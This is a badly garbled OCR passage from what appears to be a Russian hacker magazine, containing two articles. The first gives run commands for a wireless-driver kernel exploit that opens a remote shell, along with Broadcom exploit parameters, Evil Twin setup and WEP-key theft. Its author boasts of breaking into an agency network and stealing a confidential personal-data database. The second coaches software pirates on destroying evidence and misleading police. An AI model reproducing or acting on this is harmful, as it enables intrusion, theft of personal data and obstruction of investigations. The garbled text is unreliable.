как можно быстрее. Итак, мы залезли на 
оборудование. Дальнейшие действия зависят 
только от твоей фантазии! Из самого простого 
— можно попытаться воспользоваться паролем 
какого-либо пользователя, например, пассвор- 
дом отящика электронной почты или I СО. 

□Атака на драйверы беспроводного 
устройства 

3 сентября 2006 года ЗоИпу СавЬе описал 
принципиально новую атаку, суть кото- 
рой в том, что, используя уязвимости 
драйверов, можно выполнить неавторизиро- 
ванный код. Уязвимы следующие продукты: 



> Карта боевых сражений :) 



ЁРЯ 



Зкѵогпоу 



5й1 а 



ѴИІАР 

Интернет Геля 



Гемак 



ЛВС 



132.1 68.0.1 00 [ХХХ) 
Порнушннг, 



0.А.Й |Б Дд 

Сиене Ша Р“ Иарм 

-Ш — ІЙ |В 0 



Боббе 



Шары Шары Хомяк 
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>В СШАполиция 
арестовала жителя 
Флориды зато, что 
он самовольно под- 
ключался к чужой 
беспроводной сети 
ѴѴІ-РІ. 41-летнего 
Бенджамина Смита 
обвиняют в несанк- 
ционированном 
проникновении 
в компьютерную 
сеть Ричарда 
Дайнона, который 
в минувшем апреле 
заметил, что Смит 
подъехал к его 
дому на автомобиле 
и стал пользоваться 
ноутбуком. 
Последующее 
разбирательство 
подтвердило факт 
несанкционирован- 
ного доступа. Если 
ты собираешь 
повторить подобный 
опыт, готовься 
к тому, что твои 
действия могут 
попасть под статьи 
УК РФ. 




> На диске к жур- 
налу™ найдешь 
уникальную пре- 
зентацию хакеров 
Дэвида Мейнора 
и Элча, создателей 
І_0ПС0І\І. 





С іет 3 1 \ст 4 - 



Н іс 1 * 05 о Г Ь V іп ЙО из ИГ [БсрСия 5.1. 26 00 ] 

СО Корпорация НаМкросОФТ . 1985-2001, 

|С:ЧІоеипеп^ апсі 5еиіпдз^5кмогппу>с(1 Рабочий стол 

р:М&оеигоеп1і агиі ЗеІІііідвЧвІсиогпоуЧРабочнй стол>рек'1 

П Иа г Йиа ѵе _аис1 іі о г , р 1 
В <С>ойей Ьц . ' ЕКЕИГі ] : . 

Ь**р://сир.ви/ 

Уваде: кАѵйиаѵе_аисіііог . рі -в <зіагі ір> -е <епй ір> Г^иі 
КсчиігссІ ' і Ор* іопаі : —и 

:,д т : ЬагАѵагв^йиІііог -з 192.168.3*1 -е 192*168*0.100 

0 ІС I ЗОіШЗ опіу Х.Х.Х.* 

С і \Гос ипе п і з ап сі 5 с I Е іп уз Ч ■; кс о :: п о уЧРай о чин с т о л > 



П К 



ы 



> Демонстрация работы скрипта-аудитора 



АРРЬЕ : МасОЗ X 10 . 4 
ШТЕЬ:ІпДе1 РКО/МгеІезз 2200ВС 
ШТЕЬ:Іпке1 РКО/МгеІезз 2915АВС 
ІЫТЕЬ : Іпкеі РКО/МгеІезз 2100 
ІЫТЕЬ : Іпкеі РКО/МгеІезз 3 945АВС 
(ѵ\/22п50 . зуз , ѵ\/22п51 . зуз , ѵ\/29п50 . зуз , 
ѵ\/29п51 . зуз) 

Заметь, вторая карта из этого списка фигурирует чуть л и 
не в каждом магазинном ноутбуке. Компрометировать уда- 
ленные системы можно с использованием БОКСОМ 
[ Ыір://802. 1 1 піпіа.пеі/собе/Іогсоп-сцггепБідг ]. Говоря о воз- 
можностях проведения атаки, следует отметить, что обяза- 
тельным и условиями ее успешного осуществления являются 
только включенная ѴѴІ-Рі карта и непосредственная близость 
хакера к «радиусу действия» беспроводной сети. Сейчас 
я продемонстрирую атаку, которую проводил не раз. 

зкѵо 2 @сир # ./Іогсоп -с 1 -б 80 -В 
00:0С:6Е:4Е: А2 : О О 

Еіпсііпд скаппеі апсі зідпаі зкгепдкк . . . ВОНЕ ! 
Ргерагіпд зкеіісосіе . . . 



Зепсііпд аккаск . . . 

Шгікіпд ког гезропзе 
Сок зкеіі ! 

Разъясню параметры запуска. Здесь ‘-с’ — номер канала 
(по умолчанию 1); ‘-б’ — «слушаемый порт», его мы бу- 
дем бомбить специальными пакетами; '-С — атакуемая 
машина. Крометого, присутствует флаг '-г’ — порт для 
Ьасксоппесіъподключения при удачном захвате машины. 
Дальшеты можешь выполнять любые интерпретируемые 
консольные команды. 

Следует подробнее остановиться на методе выполнения 
подобной атаки — іъггіпд. Термином «Іиггіпд» объеди- 
няют действия, сопровождающие выявление большинс- 
тва дефектов безопасности. Один из приемов фаззинга 
основан на внесении ошибок путем передачи приложению 
«кривых» данных. Конкретно в описанном примере это вы- 
глядиттак: на атакующего обрушивается шквал СЮР-паке- 
тов по 1400 байте определенным интервалом. 

В посылаемые пакеты внедряется шеллкод, который 
исполняется в режиме ядра. 

Подробности этого чуда были приведены Крисом Касперски 



> Исследования «нового» беспроводного сетевого окружения 



С:\Босипеп1;з апсі ! 
Имя сервера 


5е11 іпдз\зкоо 2 поу>пе 1 оіеи 
Заметки 


к\БЕЫІ8 




к\НОМЕ-2Е1ЕТ6АВ61 




\\НОМЕ_161 


Нопе_161 


к\НОМЕ 163 


192.168.0.100 


\\іѵи?к0гзооовсіш 




ѴчКОРТЕВО 




ѴчМОВІЬ 


МоЪіІ 


\\8Ки02Ы0У-Р1814Е 




\\Х-11 


В 


\\ѴОВК-СРЕ9209А4С 


компьютер Галы 


Команда выполнена 


успешно . 



/ 070 



ХАКЕР 02 /98/ 07 




>Узнаем адресацию в беспроводной сети 



> Вывод МеІЬіоз-статистики с локального компа 



в октябрьском номере, а главное, что стоит 
извлечь из этого, — ошибки синхронизации 
фреймов, которыми можно не только вызвать 
отказ в обслуживании, но и передатьуправле- 
ние на шеллкод. 

Похожий метод компрометации, но с использо- 
ванием абсолютно другого пособа захвата, при- 
сутствует в драйверах Вгоабсот, которые 
обычно поставляются в стандартной сборке 
ПКкомпаний НР, йеН, 6а!еѵѵауи еМасЫпез. 

Эта уязвимость, обнаруженная в рамках 
программы МоКВ (МопіЬ о! Кегпеі Вида), про- 
воцирует переполнение буфера драйвером для 
беспроводныхустройств Вгоабсот ВСМѴѴІ_5. 
5У5 путем некорректной обработки ответов 
карточки 802.1 1, содержащих длинное 55Ю- 
поле, и приводитк исполнению произвольного 
кода в привилегированном режиме. Исход- 
ный код эксплойта можно найти в Меіавріоі! 
Ргатеѵѵогк, :ѴѴі пбоѵѵг : : 0 гіѵег: : В гоабсот_ѴѴі Рі 
_55Ю < МзРіЕхрІоіРіРеппоІе на Рыбу. В папке 
Л га т еѵѵо гкЗ Л ги п к/т о б и Іез/ех р Іо кз/ѵѵі п б оѵѵз/ 
бгіѵег расположена еще парочка хорошихтем 
под баги в дровах ѴѴІ-РІ, о которых написано 
ниже. Обрати внимание на строки во всех спло- 
итах под НИХ: 

ОрСЗСгіпд . печл/ ( ' ' , [ 

Сгие, " ТЪе МАС асМгезз об Ске 
СагдеС зузСет" , ' ЕЕ : ЕЕ : ЕЕ : ЕЕ : ЕЕ : 

РР' 1 ) , 

орс тс . пеѵ^ ( ■ кштше 1 , | 

Сгие, " Тке пишЬег об зесопсбз Со 
гип Ске аССаск" , 60] ) 



Ихты изменяешь сразу или запускаешь сплоит 
с соответствующими флагами. После заверше- 
ния процесса ты сможешь выполнять неавто- 
ризированный код. 

□ Атака на конечные клиенты 

Заметь, что проделать та кой легкийтрюк мне 
позволила абсолютная незащищенность сети 
и возможность подключения с любым МАС- 
адресом. Но представь, что перед нами грамот- 
но настроенная сетка. Тратить время на сниф 
инициализационных векторов для подбора ѴѴЕР 
не оченьхочется, особенно когда дело проис- 
ходит на улице. Безусловно, при определенном 
опыте ты сориентируешься, чтоделать. Об од- 
ном из возможных решений сейчас пойдет речь. 
Наверняка, тебе запомнилась статья хЫр'а 
[ цзізесигку.іп^о ] «С любовью из России». При- 
мечательность атаки ЕѵіІТѵѵіп, которую описы- 
вал автор, состоит в том, что она абсолютно 
«прозрачна» и незаметна жертве. Эмулируя 
«точку-близнец», вся сетевая инфраструктура 
коннектится к твоему хозяйству, предоставляя 
тебе возможность для компрометации. Для про- 
ведения ЕѵіІТѵѵіп нам потребуется знать 
МАС-адрес найденнойточки доступа, канал 
и 55Ю. Эту информацию™ можешьс легко- 
стью узнать из ЫеізіатЫегили Кізѵѵіп. Вос- 
пользовавшись штатными средствами своего 
адаптера, легко перевести его в режим «ас! 
аз базе зіюбоп», но учти, что чипсетадаптера 
должен быть на базе адеге/Негтез, иначе затея 
сорвется. В результате пару ми нут ты будешь 
чувствовать себя админом, настраивая 



диапазон выдаваемых ІР'шников, идентифика- 
тор сети и еще многое ругое. Естественно, мощ- 
ность сигнала «твоей» точки должна быть 
выше подменяемой. После коннекта клиентов 
к твоей точке доступа, ты спокойно выполнишь 
аудит в испеченной сети, каку себя в любимой 
локалке. Еслиты все просек, то, используя 
фейковыеточки, ты можешь без палева изучать 
стороннюю беспроводную инфраструктуру. 
«Ѳпіѵігбгаѵѵ» — «ѵѵагбгіѵіпд» наоброт, термин, в 
первыеупомянутый в докладе Подие Эдиабгоп 
известной ЗЬгтюо. Заюзав беспроводной 
Нопеуро! из своего ноутбука, ты извлечешь 
всютуже информацию, которую ты узнавал из 
сканеров беспроводных сетей. Создать такой 
софтварно можно на базеЗок АР, либо Кагта 
Тооіз, которая, кроме возможности эмуляции 
АР, на своем борту имеет встроенный Икр-, ЕТР-, 
БЫЗ-, ОНСР-и РОРЗ-сервер (тосіиіез/зегѵегз). 

□ Воровство ѴѴЕР по-другому 

Существует ряд моделей оборудования, кото- 
рые хранят ѴѴЕР-ключ для авторизации сети 
в реестре. Как правило, эти модели используют 
подключаемую через 115В ѴѴІ-Еі карточку, вроде 
ІпІеІ(Р) РРО/ѴѴігеІезз 201 1 В БАЫ 115В Оеѵісе. За- 
получив доступ непосредственно к подобной 
тачке, ты безтруда сможешь выхватить его 
обращением к соответствующей ветке реестра. 

[ НКЕУ_ЬОСАЬ_МАСНШЕ \ ЗУ8ТЕМ\ 

СопСго18еС001\ 

СопСго1\С1азз\ {4Б36Е972-Е325- 

11СЕ-ВЕС1-08002ВЕ103 18 } \ 0 0 0 8 ] 



> Подозрительный хлопец в списках сетевой активности, 

занимающийся разработкой приложений для ѵѵеЬ, сразу обратил на себя мое внимание 



Активные 


подключения 






Имя 


Локальный адрес 


Внешний адрес 


Состояние 


ТСР 


зкоогпоу-Р1814е :1135 


10.222.1.16:пеіЬіог-г 


зп ТІМЕЩШТ 


ТСР 


зкоогпоу-Р1814е :1053 


ІосаІЬозІ: :1054 


Е8ТАВЫ 8НЕБ 


ТСР 


зкоогпоу-Р1814е :1054 


ІосаІкозТ :1053 


Е8ТАВЫ 8НЕБ 


ТСР 


зкоогпоу-)Р1814е :1136 


192-168 .0.100:пеіЬіоз 


— ззп ТІМЕЩШТ 
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Нйьвхоз тіоЕмсіои 


СП 198. 


149.0.100 




& нале; іп ЪаЫе 








Н0НВ_161 


00 




ТЗогкгЬаЪіоп гегѵісе 


паше 


іганонЕ 


00 


0800Р 


ѴСГк&ЫЪісп **2ѵіс* 


паше 


М0на_ібі 


го 


шпона 


Зегѵег зегѵісез паше 




ігенонЕ 


18 


ОВД0Р 


Сгоир паше 




МЗНОНЕ 


ДР 


ШІІ0ІІЕ 


Ьгсизвг паше 




СЯ_НЗВЕШ5;Н_ 01 


СВОІТР 






НАС а&йгезе - 


4: 00 : ОС 


:6Е:4Р: 


А2 : 00 




АЪЕЙЕфЕІПд Ѣ 


ИІІЬЬ ееяяіап сапйес&іап ап 192.169.0 


,100 


НЩіКг ІКІІО& 


«исссгяЁи! со 


ѴЧ 198. 169.0, 190ЧХР6Р 





> Информация, полученная из МеІВіоз крайне актуальна 




>С помощью несанкционированного доступа в беспроводную 
сеть мне удалось похитить конфиденциальные данные особого 
назначения 



(ключ зависит от конкретного 
устройства) 

" Кеу 1 2 8" = "2544801583660(17 009 аЬсйе 
100000000000000 " 

"Бе^КеуІсі12 8 " = " 1 

Осматриваем раздел и видим примерно 
следующий текст: «"Оеі : аи11:Кеу5"="364е0181 5ЬЗ 
00сІ8038аЬс51 : Ш0000000000000"» І где первые 1 2 
чисел — ѴѴЕР-ключ в ріаіпіехі. На аналогичной 
системе, с драйвером 1 .1 5.18.0, ключ распола- 
гался в РгоІІІез^еІаиіЛѴѴерКеу. 

Для началатебе потребуется определить 61ІЮ 
устройства для подстановки. Исходный код 
программы, позволяющий это сделать, ты най- 
дешь на диске. Там же описано, как все-таки 
нарыть этот ѴѴЕР-ключ софтварно. Если же 
ситуация осложнена тем, что ключ не хранится 
в реестре, что, естественно, небезопасно, то 
смело за юзай уязвимость в ІпІеІѴѴІгеІеБВ Зегѵісе 
(524еѵтоп.ехе). С помощью этого бага локальный 
пользователь может получить конфигурацион- 
ные данные беспроводного оборудования, в том 
числе ѴѴЕР-ключи. Уязвимость присутствует 
из-за небезопасного разграничения прав на 
доступ к общей секции \Ва5е№тесЮЬіес1:5\ 
524ЕѵепіМападег5ЬагесІМеппогу\, которая 
используется службой ѴѴІгеІезв Мападетепі 
Зегѵісе, что позволяет атакующе му 
читать, писать, удалять сегменты информа- 
ции в памяти. Смело компилируй сплоитѵс++ 
и запускай на вражеской тачке, после запуска 
получишь что-то вроде: «РоззіЫе АІрЬапигшегіс 
ѴѴЕР КЕУІоипсІ: М%2т2кІ». 



О О том самом, или ловкость рук 

В докладе Контрольно-счетной палаты США 
отмечено, что ѴѴІ-Еі технологии, внедряемые 
в правительственные организации, не имеют 
должной безопасности. По их сводкам, в 13 
агентствах не установлена защита, а в боль- 
шинстве агентств не отслеживается про- 
исходящее в беспроводных сетях. В одном 
из агентств 90 ноутбуков настроены на 
автоматический поисксигнала в эфире, что 
может привести к нахождению подставного 
сервера. Поверь, в родной России ситуация 
абсолютнотакаяже, порой корпоративная 
инфраструктура настроена гораздо грамотней 
государственной. Так, одним зимним вечерком 
мнеудалосьукрасть, пожалуй, одну из важ- 
нейших ведомственных баз «Еипаг» из здания 
далеко не отдаленного, скажем так :]. 
Наверняка, тебе известно, что существует ряд 
баз данныхдля служебного пользования. Вот 
некоторые из них: «Лабиринт» (база дан- 
ных о политиках и их биографиях), база 
«Лунар» (телефоны и справочная информа- 
ция о руководящем составе МВД, налоговой 
полиции, правительства, прокуратуры, Газ- 
прома и пр.), база «БТИ» (собственники жилья 
в Москве), база «ГИБДД» (полные данные 
по автовладельцам Москвы) и т.п. Дистрибу- 
тивы подобных вещей хранятся в сейфахза 
толстыми стенами и право их использования 
имеютлишь избранные сотрудники. Больше 
всего меня интересовала база «І_ипаг» по лич- 
ным соображениям. Получив автоматически 
ІР-адрес, я попал в просторы Сети. Прогля- 



дывая сетевую статистику (пеівіаі), я обратил 
внимание на ІР-адрес 1 92.1 68.0.1 00. После его 
открытия в браузере выяснилось, что за ним 
скрывается поднятый НТТР-сервер, на котором 
отлаживались какие-то ѵѵеЬ-приложения, на- 
поминающие интерфейс к СУБД. Востре- 
бованность узла была налицо, и активность 
пользователей явно присутствовала. Выяснив 
кое-что о нем, я понял, что он находится в груп- 
пе компьютеров. 

6 патез іп ДаЫе 

НОМЕ_1 б 1 0 0 ШІ<21Ж Могкзкакіоп 

зегѵісе паше 

МЗНОМЕ 00 СКОІІР Могкзкакіоп 

зегѵісе пате 

НОМЕ_1 б 1 2 0 ШЮІІЕ Зегѵег 

зегѵісез пате 

МЗНОМЕ ІЕ СКОІІР Сгоир пате 

МЗНОМЕ 1Б ШН21Ш Мазкег 

Ъгсжзег пате 

## МЗВЖЖЗЕ. 01 СКОІІР 

МАО аскігезз 4: 00 : ОС : 6Е : 4Е : А2 : 00 

Получение имен доменов системы происходит 
с помощью работы с пЫзсап. При этом посылает- 
ся специальный пакет на 137/исІр порт, где висит 
соответствующая служба. Обрати внимание на 
«І\І II П веввіоп зиссезвМ Іо \\1 92. 1 68.0. 1 00\І РС$», 
открытые переменные окружения — первый знак 
наличия расшаренных ресурсов в сети. 
Крометого, из скана стало ясно, что перед нами 



> Уязвимость хранения пасса в зЬагесі_тетогу позволит тебе добыть заветный ѴѴЕР-ключ за секунды 

/////////////////////////////////////////////////////////////////////// 

//// 324ЕѵМоп.ехе Іпсеі Юігеіезз Нападетепь Зегѵісе КЕУ Нипьег 

//// КиЬеп Запьатагьа 

//// гиЬепѲгеѵегзетосіе . сот 

//// Гош*, геѵегзетосіе . сот 

//// 28/04/2006 

/////////////////////////////////////////////////////////////////////// 



/ 072 
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взлом 




Зсал іп ргодгезз, 1 оМ Мое^з) сіопе. 



100% 






Нов* Ьеіпд всаппес) 


Ргодгевв 


Ореп Рог *5 Ыоіев 


Жагшпдв Ноіев 


192 .168,0,1 


96 % 


7 16 


2 0 



> Аудит роутера 



терминальный сервер, что имеется РТР-сервер 
с разрешенным апопутоиз-доступом, откуда 
я выкачал кучу интересных данных сотрудников 
заведения. 

Существует дефект: при эмуляции вызова 
ІзаОиегуІпЬгтаІіопРоІісуО можно определить 
Иозі: 5Ю (Зесигііу ІбепбРег), который можетбыть 
использован для получения листа локальных 
пользователей, размещенных на хосте. Так 
я получил список всех юзеров. 

ТЪ.е гешоДе НюзЕ 8ІБ ѵаіие із : 

1-5-21-790525478-630328440- 

1801674531 

СѴЕ : СѴЕ-2 000-12 00 

ВІБ : 959 

— АсІтіпізЦгаЕог ассоипЕ пате 
: ?4<8=8АВ@0В>@ (ісі 500) 

— СиезВ ассоипЕ пате : ?>АВЬ (ісі 
501) 

— НеІрАззізЕапЕ (ісі 1000) 

— НеІрЗегѵісезСгоир (ісі 1001) 



- 81ІРРОВТ_3 88945а0 (ісі 1002) 

- Зегдеу (ісі 1003) 

- Аіекзеу (ісі 1004) 

Их логины можно было использовать для 
пробручивания учетных записей на тер- 
минале с помощью гшебиза (читай статью 
«Терминальная эпопея»), что я и сделал, по- 
лучив парочку аккаунтов. Это позволило мне 
побродить по пользовательским файлам всех 
работников, а на одной машине валяласьта 
самая «І_ипаг». 

Не стоит забывать об информации, которую пре- 
доставила служба ЫеіВІОЭ. Действительно, на- 
ша цель находится в сетевой группе. Заходим 
в «Сетевое окружение -> Отобразить ком- 
пьютеры в рабочей группе» (консольно: пеі: 
ѵіеѵѵ). Чтобы получить детальную информацию 
о строении сети, открой вкладку «Місгозок 
ѴѴІпбоѵѵз Ыеіѵѵогк (МѴѴІЧ)». Выполнил провер- 
ку ресурсов сети пеі иве, анализируй их на 
предмет шар. Безусловно, я бы мог покопаться 



в «чужом белье», полазив по компам рабочей 
группы, но все же существует определенная 
этика, о которой следует помнить любому 
хакеру, поэтомуя ограничился простым 
пеізепсГом с девизом «Ргіѵѵеі коІдоіосЬ пікі ! д 
етадІаЫ п (С)» и просмотром желаемой базы 
на харде одного из сотрудников. Я умышленно 
не стал скрывать свое присутствие, и это ввело 
админов в панику — судорожно они начали 
производить защитные действия и сканы 
моей системы. Но у меня всегда грамотно 
настроена Ю5, файрвол (ѵѵірб), а ОС перебита 
с помощью Эесигку Сіоаскег'а (его ты най- 
дешь на диске). При попытке определения 
«марки» моей системы, товарищам сотруд- 
никам выдавалосьязвительное сообщение 
«Ріаузіаііоп». Удивлен? Дело в том, что, изме- 
няя параметры в реестровой ветке 5Ѵ5ТЕМ\\ 
СиггепЮопІго15е1:\\5егѵісе5\\Тсрір\, ты сможешь 
«смущать» любые сканеры безопасности, ведь 
они основываются на вполнетрадиционных 
методах анализа. И-И 
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КРЭКЕР И ЗАКОН 



КАК ОБОЙТИ УЛОВКИ ФИНАНСОВОЙ МИЛИЦИИ 



Любой состоявшийся крэкер хотя бы раз в жизни мечтал зарабатывать деньги на сво- 
ем мастерстве. У многих это вполне успешно получается. Но никто не имеет гарантий 
того, что он сможет безнаказанно заниматься этим делом, пока не надоест. Как гово- 
рится, от сумы и от тюрьмы не зарекаются. Эта статья не просто параноидальный бред 
обдолбанного крэкера. Все, о чем ты прочитаешь здесь, испытано мной на собственной 
шкуре. Именно ради этой статьи мне пришлось пройти через огонь, воду 
и обвинительное заключение. И если эта статья выходит в свет, значит, я до сих пор 
на свободе и продолжаю заниматься любимым делом. 



рэкерство — само по себезанятие 
очень интеллектуальное. Каждый 
взлом — это головоломка. Когда 
занимаешься крэкерством доволь- 
но долго, начинаешь видеть головоломки во 
всем. Если воспринимать жизнь как интересный 
квест, а сложные моменты как простые задачи, 
у которых наверняка есть правильные реше- 
ния, становится гораздо проще справляться 
с проблемами. Но это всетеория, которая мало 
кому может пригодиться. Для крэкера главное 
— практический результат. 

Эту статью я хочу начатье рассмотрения вопроса 
«правильной» продажи пиратского софта или 



патчей, а закончить рекомендациями по тому, что 
предпринимать, если дело все-таки дошло до суда. 

□ Продажа 

Продавать пиратское ПО и собственноручно 
написанные патчи всегда было опасным заня- 
тием. В этом деле главное не кричать налево 
и направо, что ты можешь взломать любую про- 
грамму почти бесплатно. Цени себя и свой труд. 
Если будешь выполнятьтолько крупные заказы, 
во-первых, тебя все будутуважать, а во-вторых, 
будет не так обидно, если тебя поймают. 

Никогда и никому иззаказчиков не показывай- 
ся и не свети свои личные данные, такие как 



фа милия, имя, номер паспорта, адрес, телефон и т.д. 
По возможности делай все через доверенное 
третье лицо (или попростудропа — примечание 
редактора), только никогда и никого не подстав- 
ляй, иначетебя сдадут со всеми потрохами, да и, 
вообще, это не по-человечески. 

□ Получение денег 

Деньги получайтолько наличными — безна- 
личные расчеты, включая платежные системы 
в Сети, оченьпрозрачны для спецслужб. Любые 
денежныетранзакции, проходящие через сто- 
ронних посредников, рано или позднозамыка- 
ются на тебе. 
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> За такой патч тебе ничего не будет! 



Если ты заранее знаешьточную сумму, которую тебе должны 
заплатить, постарайся иметь эту же сумму с собой. Фишка вот 
в чем: если ты попадешь под контрольный закуп, то купюры, 
которыми с тобой рассчитаются, либо будут меченными, 
либо ихсерийные номера окажутся заранее зафиксированы 
в акте, с которым тебя обязательно должны ознакомить. 

Эти купюрыты сможешь сразу спрятать в трусы, а заранее 
заготовленные, например, держать в руке. 

О Контрольный закуп 

Контрольные закупы устраиваются по просьбам владельцев 
авторских прав, программы которых очень часто покупают. 
Вместо того чтобы позаботиться о безопасности своего про- 
дукта самим, они от безысходности обращаются в правоох- 
ранительные органы. 

Процедура контрольного закупа программного обеспечения 
во многом определяется законодательством страны, в кото- 
рой™ живешь, но в целом выглядит следующим образом: 

1. сотрудники финансовой милиции получают из какого- 
либо источника телефон взломщика; 

2 находят подставное лицо, которое будет выступать в ка- 
честве клиента; 

3. клиентзвонит взломщику и проситего, например, уста- 
новить «1 С:Бухгалтерию», на что взломщик соглашается 

и назначает время; 

4. на стороне клиента устанавливается, как правило, очень 
старый компьютер (на новый, наверное, денег не хватает :)) 
с девственной ѴѴІпсІоѵѵв; 
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5. сотрудники финансовой 
милиции привлекаютспециа 
листа издоверенной компью- 
терной фирмы для осмотра 
компьютера; 

6. специалистосматривает 
тачку и даетзаключение, что 
на ней, кроме винды, ничего 
не СТОИТ; 

7. взломщик приходит к кли- 
енту и устанавливает 
«1 С бухгалтерию»; 

8. Когда взломщиксобира- 
ется уходить, в помещение 
заваливает несколько сотруд- 
ников финансовой милиции 

С ПОНЯТЫМИ; 

9. сотрудники тычут взломщику в лицо своими докумен- 
тами и говорят, чтобы он не торопился уходить, но это уже 
лирика :). 

Итак, что мы имеем? А имеем мы достаточно информа- 
ции, чтобы поиметь сотрудников финансовой милиции. 
Первое, что бросается в глаза, — это древний компьютер 
с чистой виндой. Если ты встретишь нечто подобное, 
лучше сразу откажись отустановки. Но еслиты экстримал 
(как я, например :)), то запомни два очень важных прави- 
ла: устанавливай софт только с дисков и после установки 
обязательно уничтожай их путем переламывания на мел- 
кие части (после этого никто не подумает их считывать). 
Только делай это сразу после установки, не дожидаясь 
сотрудников в форме. Диск — это первая и единственная 
улика противтебя. Вторая — это комп с установленной 
программой, но без диска онане имеет никакой силы. 
Только представь себе лица сотрудников милиции, когда 
ты покажешь им кусочки диска в одной руке и пачкутвоих 
собственных денег в другой. 

Естественно, просто тактебя никто не отпустит — попросят 
написать объяснительную. На системном блоке-то осталась 
установленнаятобой программа. Смело пиши в объясни- 
тельной, что тебе позвонили и попросили помочь настроить 
такую-то программу, на что ты согласился и сказал, что 
ни копейки не возьмешьза это. А потомтолпой завалили 
сотрудники финансовой милиции и стали обвинять тебя 
в установке пиратского софта. 

Атеперь — внимание! То, о чем я тебе сейчас расскажу, 

— это результат самой настоящей слежки за работниками 
финансовой милиции. Во время проведения контрольного 
закупа на расстоянии 150-300 метров расставлены как 
минимум две группытак называемого подкрепления. Все 
они снабжены рациями или подслушивающими устройства- 
ми, что уже само по себе без твоего ведома незаконно. Так 
что будь готов к тому, что тебя услышит много ушей, которые 
в любой момент могут тебя накрыть в прямом смысле слова. 



ОФИЦИАЛЬНЫЙ текст 



ПО С О □ Т О Я СИіі КЗ ил 

1 □ февраля 2006 Г. 




>Эта статья носит 
ознакомительный 
характер и никаким 
образом не провоци- 
рует на противозакон- 
ные действия. Если 
ты попался, в этом 
виноваттолькоты сам. 
Ни автор, ни редакция 
ответственности за 
твои действия не 
несут. 
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> Крэкерский компьютер 



□ Обыск 

Никогда не сталкивался с обыском, но лучше 
быть к нему готовым, потому что происходит 
он, как правило, неожиданно. Лично мне 
угрожали обыском, но так никто и не пришел 
(а я такждал :]]. 

Перед тем как за пустить сотрудников правоох- 
ранительных органов к себе домой, потребуй 
постановление на обыск. Без этой бумажки 
они не имеют права даже переступать порог 
твоего дома. 

Будь готов к тому, что твой комп заберут на экс- 
пертизу. Правда, если он прибит по запчастям 
к стенке, несколько мониторов стоят в разных 
местах и работают, а системным блоком вообще 
не пахнет, эти товарищи сразу впадают в глу- 
бокий ступор и вызывают подмогу в качестве 
штатного специалиста, который, скорее всего, 
забереттолько жесткие диски. Хотя может 
собрать все, включая мониторы, клавиатуры, 
мыши и компакт-диски. Кстати говоря, ты еще 
скажешь большое спасибо ребятам из «Хакера» 
за то, что они не выкладывают кряки и кейгены 
на диски :). 

Во-первых, никогда не держи результаты своих 
грязных дел на домашнем компе. Записывай их 
на болванки и отдавай на хранение соседу или 
знакомому. 

Во-вторых, на твоем компе должно быть 
установлено либо лицензионное ПО, либо 
бесплатное, либо невзломанные демо- и триал- 
версии. И вообще, лучше поставь піх’ы. Ты же 
не хочешь покупатьу дяди Билла его глючное 
творение за хрен знает сколько енотов. 

□ В финансовой милиции 

Если ты совершил глупость, попавшись на 
контрольном закупе, и, более того, дал свои 
реальные данные, включая адрес проживания, 
ожидай в течение двух недель повестку в саму 
Финансовую Милицию. Еслитебе позволяют 
возможности, заранее найми хорошего адвока- 
та и в первый же раз иди туда с ним. 

Хорошо было бы посидеть с адвокатом около су- 
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ток возле компа с Уголовным кодексом РФ напе- 
ревес. Вы могли бы реально оценить ситуацию 
и возможные последствия. Я знаю случай, когда 
адвокат вытащил обвиняемого уже при первом 
посещении финансовой милиции. 

Дело в том, что все статьи Уголовного кодек- 
са РФ написаны людьми очень далекими от 
компьютерной грамотности. Поэтому самое 
страшное, что тебе могут инкриминировать, 

— это нарушение авторского права, которое 
компенсируется возмещением ущерба в раз- 
мере стоимости копиитой программы, которую 
ты сломал. Если ты написал патч или кейген, 
тебе за это вообще ничего не будет, потому 



> А могло бы быть уликой 



что более-менее имеющие к этому отношение 
статьи Уголовного кодекса охватываюттолько 
вирусы и трояны. Адвокаттебе скажеттоже 
самое, поэтомупри небольшойтренировке 
ты и сам сможешьоправдатьсебя. 

После проведения контрольного закупа доку- 
менты, имеющие отношение к делу, передаются 
следователю, к которому™ будешь вызван. 
Разговаривая со следователем, отвечай на 
вопросы по возможности правдиво, но когда 
он будет давать тебе подписывать бумаги, будь 
осторожен! Проверяй в них каждое слово. 
Обязательно посмотри статьи, которыетебе 
приписывают. Тебе могут приписать лишнюю 
статью или «ошибиться» с частью, под которую 
ты попадаешь. Вдруг окажется, что преступле- 
ние™! совершал совместное группой лиц или 
неоднократно. Не верь ни единому красивому 
слову следователя, потому что в его интересах 
посадитьтебя или навесить километровый 
штраф. Но не торопись опровергать статью 
о модификации и порче программного обеспе- 
чения. Читай дальше — поймешь почему. 

О До суда 

Если ты ничего не смог предпринять и обвине- 
ниеуже выписано, не расстраивайся — естьеще 
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>Зданиефинансовой милиции 

один действенный путь и называется он «При- 
мирение сторон». Обвиняемый и пострадавший 
вправеурегулироватьспор, заключив мировое 
соглашение на взаимовыгодныхусловиях. 

Не дожидаясь суда, найди обладателя прав на 
сломанноетобой программное обеспечение 
и встреться с ним на нейтральной стороне. 

Сам понимаешь, что разговаривать нужно без 
наездов, спокойно. Одно-единственноетвое 
неправильное слово — и он никогда в жизни 
не пойдете тобой на примирение. Он, в свою 
очередь, должен прийти к мысли, что если осу- 
диттебя, то ничего с этого не поимеет и только 
наживет себе нового врага. Если тебе повезет, 
он просто так, безвозмездно, избавиттебя от 
неприятностей. Нуа если он какой-нибудь 
жлоб, то договорисьс ним о погашенииущерба 
в размере стоимости его программы. В любом 
случаетебе это выйдет дешевле, да и судимости 
не будет. После этого при первом же заседании 
суда он должен отказаться от своего искового 
заявления. 

Если по каким-то причинам ты сам не смо- 
жешьдоговориться с пострадавшим, попроси 
своего адвоката. В конце концов, он сделает 
это грамотнее. 

□ Собственно, суд 

Если ты следовал всему, что я написал, но дело 
все-таки дошло до суда, то, скорее всего, парень, 
ты попал по полной программе. Не расстраи- 
вайся, ведь даже в этом, как ни странно, можно 
найти свои плюсы. Например, с судимостью 
тебя не возьмут в армию. Как тебе? Вообще, 
еслиты тесно связан с крэкингом или хакингом, 
суди мостьбудеттебе только украшением. Помни 
одно — за крэкингтебя никто не должен посадить. 
Максимум, что тебе светит, — условная судимость 
и нехилый штраф. Во время суда бейся до послед- 
него. Воттутхорошобылобы иметь адвоката. Если 
у тебя нету своего, то по законутебе обязаны дать 
штатного. Он будет бесплатным, но на его услуги 
сильно не надейся. Его зарплата не изменится, 
если он проиграеттвое дело, такчто смотри сам. 



□ Теперь небольшая разминка для ума 

Допустим, тебя обвинили по делу в установке 
